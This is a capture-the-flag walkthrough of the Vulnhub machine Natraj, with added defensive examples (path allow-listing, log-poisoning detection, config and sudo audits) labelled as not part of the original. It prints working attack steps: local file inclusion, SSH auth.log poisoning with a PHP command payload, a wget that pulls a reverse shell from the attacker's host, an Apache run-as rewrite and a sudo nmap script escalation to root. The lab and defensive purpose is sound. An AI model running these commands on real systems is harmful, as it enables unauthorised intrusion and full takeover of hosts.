[VLN] Natraj

Today we are going to hack the Vulnhub machine called Natraj. You can download it from the following link: https://www.vulnhub.com/entry/ha-natraj,489/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@m0nique:~$ nmap -A -p- 192.168.112.135
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 23:15 CEST
    Nmap scan report for 192.168.112.135
    Host is up (0.00026s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
    |   256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
    |_  256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA:Natraj
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
    We take a look at Apache.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.135 -w /usr/share/wordlists/dirb/big.txt -x txt,php,html,htm
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.112.135
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     txt,php,html,htm
    [+] Timeout:        10s
    ===============================================================
    2020/06/08 23:16:22 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htaccess.htm (Status: 403)
    /.htaccess.txt (Status: 403)
    /.htaccess.php (Status: 403)
    /.htaccess.html (Status: 403)
    /.htpasswd (Status: 403)
    /.htpasswd.txt (Status: 403)
    /.htpasswd.php (Status: 403)
    /.htpasswd.html (Status: 403)
    /.htpasswd.htm (Status: 403)
    /console (Status: 301)
    /images (Status: 301)
    /index.html (Status: 200)
    /server-status (Status: 403)
    ===============================================================
    2020/06/08 23:16:34 Finished
    ===============================================================
    We see there is a directory called /console. Inside it there is a file called file.php. After trying several parameters on file.php, we find that the one that works is ?file, and when we pass it a file name we see that it is vulnerable to LFI. So, if we visit http://192.168.112.135/console/file.php?file=/etc/passwd we can see:
    ---SNIP---
    natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
    mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
    ---SNIP---
    We look for other files we can read that might be useful, and we find that we can read /var/log/auth.log: http://192.168.112.135/console/file.php?file=/var/log/auth.log
    ---SNIP---
    Jun 3 09:41:14 ubuntu systemd-logind[434]: New seat seat0.
    Jun 3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button)
    Jun 3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22.
    Jun 3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22.
    Jun 3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
    Jun 3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
    Jun 3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0)
    Jun 3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj.
    Jun 3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0)
    Jun 3 09:41:59 ubuntu sudo: natraj : TTY=pts/
    ---SNIP---
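    The root cause here is that file.php uses the `file` parameter as a path without restricting it. The following is an added example, not the Natraj box's file.php and not part of the original write-up: a model of how such a parameter should be resolved so that /etc/passwd and /var/log/auth.log are never reachable. The document directory and the allow-listed page names are assumptions for illustration.

```python
import os

# Assumed document directory and allow-list of pages the script is meant to serve.
BASE_DIR = "/var/www/html/console/pages"
ALLOWED_PAGES = {"home.txt", "about.txt"}

def vulnerable_resolve(requested: str) -> str:
    """The pattern behind the LFI: whatever the client sent is used as the path.
    ?file=/etc/passwd or ?file=/var/log/auth.log is opened without any check."""
    return requested

def safe_resolve(requested: str, base_dir: str = BASE_DIR, allowed=ALLOWED_PAGES):
    """Return an absolute path only when `requested` is exactly one of the
    allow-listed names inside base_dir; return None for anything else.
    Absolute paths, traversal sequences and NUL bytes are rejected before the
    filesystem is consulted, and the resolved path is checked to still lie
    under base_dir (realpath follows symlinks, so a planted link cannot
    escape either)."""
    if not requested or "\x00" in requested:
        return None
    name = os.path.basename(requested)
    if name != requested or name not in allowed:
        return None
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, name))
    if os.path.commonpath([real_base, candidate]) != real_base:
        return None
    return candidate

if __name__ == "__main__":
    for probe in ("home.txt", "/etc/passwd", "../../../../var/log/auth.log", "pages/home.txt"):
        print(f"{probe!r:40} -> {safe_resolve(probe)}")
```

    Only `home.txt` resolves; the other three probes return None, and the caller should answer with a fixed error rather than echoing the rejected value back into a log that the same script might later be asked to display.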
  • Exploitation
  • Knowing this, we connect over SSH to inject code, so that we can then use it through auth.log to execute commands :)
    sml@m0nique:~$ ssh '<?php system($_GET['cmd']); ?>'@192.168.112.135
    The authenticity of host '192.168.112.135 (192.168.112.135)' can't be established.
    ECDSA key fingerprint is SHA256:LvUVmGWIYBfaqxlxouyJwlU19DzRO0Y9dMcBclxz1zU.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.112.135' (ECDSA) to the list of known hosts.
    @192.168.112.135's password:
    Permission denied, please try again.
    Once we have tried to log in over SSH as the user '<?php system($_GET['cmd']); ?>', we prepare our reverse shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@m0nique:~$ nano php-reverse-shell.php   # Set our IP/port.
    sml@m0nique:~$ mv php-reverse-shell.php shelly.php
    sml@m0nique:~$ sudo mv shelly.php /var/www/html
    We download the reverse shell onto the victim VM by visiting:
    http://192.168.112.135/console/file.php?file=/var/log/auth.log&cmd=wget%20http://192.168.112.128/shelly.php%20-O%20/var/www/html/yo.php
    We start nc listening.
    sml@m0nique:~$ nc -nlvp 5555
    And we browse to http://192.168.112.135/yo.php to get our shell!
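    The chain above leaves two traces on the box: sshd writes the client-supplied username (the PHP payload) into auth.log, and Apache's access log records a `file=` value pointing at that log together with a `cmd` parameter. The following is an added example, not part of the original write-up, that flags both. The log lines are constructed to mirror the hosts and paths seen in this walkthrough; the access log format is the Apache combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: sshd entries as they would appear in /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Jun  3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun  8 23:20:01 ubuntu sshd[701]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.112.128 port 40122
Jun  8 23:20:03 ubuntu sshd[701]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 192.168.112.128 port 40122 ssh2
Jun  8 23:25:10 ubuntu sshd[733]: Failed password for mahakal from 192.168.1.103 port 50001 ssh2
"""

# Constructed sample: Apache combined-format access log entries.
SAMPLE_ACCESS_LOG = """\
192.168.1.103 - - [08/Jun/2020:23:10:02 +0200] "GET /console/file.php?file=home.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.112.128 - - [08/Jun/2020:23:18:40 +0200] "GET /console/file.php?file=/etc/passwd HTTP/1.1" 200 1804 "-" "curl/7.68.0"
192.168.112.128 - - [08/Jun/2020:23:31:12 +0200] "GET /console/file.php?file=/var/log/auth.log&cmd=id HTTP/1.1" 200 9210 "-" "Mozilla/5.0"
"""

# sshd messages that embed the username exactly as the client sent it.
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|(?:Failed|Accepted) \w+ for(?: invalid user)?) "
    r"(?P<user>.*?) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)
# Fragments that have no business in a login name but are typical of injected PHP.
CODE_MARKERS = re.compile(
    r"<\?|\?>|\$_(?:GET|POST|REQUEST)|\b(?:system|exec|passthru|shell_exec)\s*\(", re.I
)
SANE_USERNAME = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")
REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

def poisoned_ssh_usernames(auth_log_text):
    """Return sshd entries whose username carries code or is not a plausible login."""
    hits = []
    for line in auth_log_text.splitlines():
        m = SSHD_USER.search(line)
        if not m:
            continue
        user = m.group("user")
        if CODE_MARKERS.search(user) or not SANE_USERNAME.fullmatch(user):
            hits.append({"user": user, "src": m.group("src"), "line": line})
    return hits

def suspicious_file_reads(access_log_text, param="file"):
    """Return requests whose `file` value leaves the web root: an absolute path,
    a traversal sequence, or a log file. `with_cmd` marks the second stage of
    the chain, where a command parameter rides along with the log read."""
    hits = []
    for line in access_log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for value in query.get(param, []):
            if value.startswith("/") or ".." in value or "/var/log" in value:
                hits.append({"src": line.split()[0], "file": value, "with_cmd": "cmd" in query})
    return hits

if __name__ == "__main__":
    for h in poisoned_ssh_usernames(SAMPLE_AUTH_LOG):
        print("auth.log  ", h["src"], repr(h["user"]))
    for h in suspicious_file_reads(SAMPLE_ACCESS_LOG):
        print("access.log", h["src"], h["file"], "cmd" if h["with_cmd"] else "")
```

    Either signal alone is worth an alert; the same source address appearing in both, minutes apart, is the pattern of this exact intrusion. Restricting the web server's read access to its own log directory (auth.log is not normally world-readable on Ubuntu) closes the second half of the chain even where the LFI itself remains.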
  • Low Shell
  • sml@m0nique:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.135] 53298
    Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
     16:33:36 up 19 min,  0 users,  load average: 0.01, 0.01, 0.02
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty; pty.spawn("/bin/bash")'
    www-data@ubuntu:/$
    We "upgrade" our shell.
    www-data@ubuntu:/$ ^Z
    [1]+  Detenido                nc -nlvp 6666
    sml@m0nique:~$ stty raw -echo
    sml@m0nique:~$ fg
    www-data@ubuntu:/$ export TERM=linux
    We're in! Let's explore a bit with the linpeas.sh script[1].
    www-data@ubuntu:/$ cd /tmp
    www-data@ubuntu:/tmp$ wget http://192.168.112.128/linpeas.sh
    www-data@ubuntu:/tmp$ sh linpeas.sh
    ----SNIP----
    [+] Interesting writable files owned by me or writable by everyone (not in Home)
    [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
    /dev/mqueue
    /dev/mqueue/linpeas.txt
    /dev/shm
    /etc/apache2/apache2.conf
    /run/lock
    /run/lock/apache2
    ----SNIP----
    We see that we can modify the file /etc/apache2/apache2.conf. We edit it:
    www-data@ubuntu:/tmp$ nano /etc/apache2/apache2.conf
    We change the following:
    # These need to be set in /etc/apache2/envvars
    User ${APACHE_RUN_USER}
    Group ${APACHE_RUN_GROUP}
    To the following:
    # These need to be set in /etc/apache2/envvars
    User mahakal
    Group mahakal
    That way, after a restart, Apache will run with the permissions of the system user we saw in /etc/passwd (mahakal), and when we get the reverse shell again it will have that user's privileges. WE REBOOT THE VM, and once it is back up we set nc listening again:
    sml@m0nique:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    We visit http://192.168.112.135/yo.php and see that we now have the privileges of the user mahakal:
    $ id
    uid=1001(mahakal) gid=1001(mahakal) groups=1001(mahakal)
  • Privilege Escalation
  • $ python3 -c 'import pty; pty.spawn("/bin/bash")'
    mahakal@ubuntu:/$ sudo -l
    sudo -l
    Matching Defaults entries for mahakal on ubuntu:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User mahakal may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/nmap
    mahakal@ubuntu:/$ echo 'os.execute("/bin/bash")' > /tmp/yeah.txt
    mahakal@ubuntu:/$ sudo nmap --script=/tmp/yeah.txt
    sudo nmap --script=/tmp/yeah.txt

    Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-11 04:22 PDT
    NSE: Warning: Loading '/tmp/yeah.txt' -- the recommended file extension is '.nse'.
    root@ubuntu:/# id
    uid=0(root) gid=0(root) groups=0(root)
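    Both escalation steps on this box come down to configuration: a service account that can write Apache's own config (and so choose which user Apache runs as), and a NOPASSWD sudo rule on a binary that executes whatever script it is pointed at. The following is an added example, not part of the original write-up, with the checks a defender would run to catch both. The uid/gid of www-data (33) and the sample apache2.conf and sudoers contents are constructed from what this walkthrough shows; the list of script-capable binaries holds only the one from the page.

```python
import os
import re
import stat

WWW_DATA_UID = 33          # assumed uid/gid of www-data, as on the Natraj box
WWW_DATA_GIDS = (33,)

# Binaries that load and run an arbitrary file handed to them (nmap --script).
# Only the one from this write-up is listed; extend from your own policy.
SCRIPT_CAPABLE = {"/usr/bin/nmap"}

def service_can_write(mode, owner_uid, owner_gid, uid=WWW_DATA_UID, gids=WWW_DATA_GIDS):
    """Pure permission check (no filesystem access, so it is easy to test):
    True if the service account could write a file with these bits and owners."""
    if owner_uid == uid and mode & stat.S_IWUSR:
        return True
    if owner_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)

def audit_config_file(path, uid=WWW_DATA_UID, gids=WWW_DATA_GIDS):
    """Apply service_can_write to a real file such as /etc/apache2/apache2.conf."""
    st = os.stat(path)
    return service_can_write(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, uid, gids)

DIRECTIVE = re.compile(r"^\s*(User|Group)\s+(\S+)", re.M)

def apache_run_as(config_text):
    """Return the User/Group directives found in an Apache config and whether
    either one names something other than the envvars placeholders."""
    found = {k: v for k, v in DIRECTIVE.findall(config_text)}
    expected = {"User": "${APACHE_RUN_USER}", "Group": "${APACHE_RUN_GROUP}"}
    tampered = any(found.get(k) not in (None, v) for k, v in expected.items())
    return found, tampered

SUDO_RULE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)

def risky_sudo_rules(sudoers_text):
    """List NOPASSWD rules from sudoers-format text, marking those whose command
    can execute a caller-supplied script as root."""
    risky = []
    for line in sudoers_text.splitlines():
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD:" not in m.group("tags"):
            continue
        runas = m.group("runas").split(":")[0]
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            binary = cmd.split()[0]
            risky.append({
                "user": m.group("user"),
                "runas": runas,
                "command": cmd,
                "shell_as_root": runas in ("root", "ALL") and (binary in SCRIPT_CAPABLE or cmd == "ALL"),
            })
    return risky

# Constructed samples: the edited apache2.conf from this write-up and a sudoers
# file reproducing the rule that `sudo -l` displayed.
SAMPLE_APACHE_CONF = """\
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
"""
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
mahakal ALL=(root) NOPASSWD: /usr/bin/nmap
%sudo   ALL=(ALL:ALL) ALL
"""

if __name__ == "__main__":
    print("apache2.conf run-as:", apache_run_as(SAMPLE_APACHE_CONF))
    for rule in risky_sudo_rules(SAMPLE_SUDOERS):
        print("sudo:", rule)
    for conf in ("/etc/apache2/apache2.conf",):
        if os.path.exists(conf):
            print(conf, "writable by www-data:", audit_config_file(conf))
```

    On a correctly installed Ubuntu host apache2.conf is owned by root with mode 0644, so `audit_config_file` returns False; the box's 0666-style permissions are what made the User/Group rewrite possible. For the sudo side, the fix is not a different rule syntax but removing the grant: a binary that accepts a script path cannot be constrained by sudoers alone.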
  • root.txt
  • root@ubuntu:/# cd /root
    root@ubuntu:~# ls
    root.txt
    root@ubuntu:~# cat root.txt
    [NATRAJ ASCII-art banner]

    !! Congrats you have finished this task !!

    Contact us here:
    Hacking Articles : https://twitter.com/rajchandel/
    Geet Madan : https://www.linkedin.com/in/geet-madan/

    +-+-+-+-+-+ +-+-+-+-+-+-+-+
    |E|n|j|o|y| |H|A|C|K|I|N|G|
    +-+-+-+-+-+ +-+-+-+-+-+-+-+
    __________________________________
  • End
  • And with that we are root on the machine :)
    [1] https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS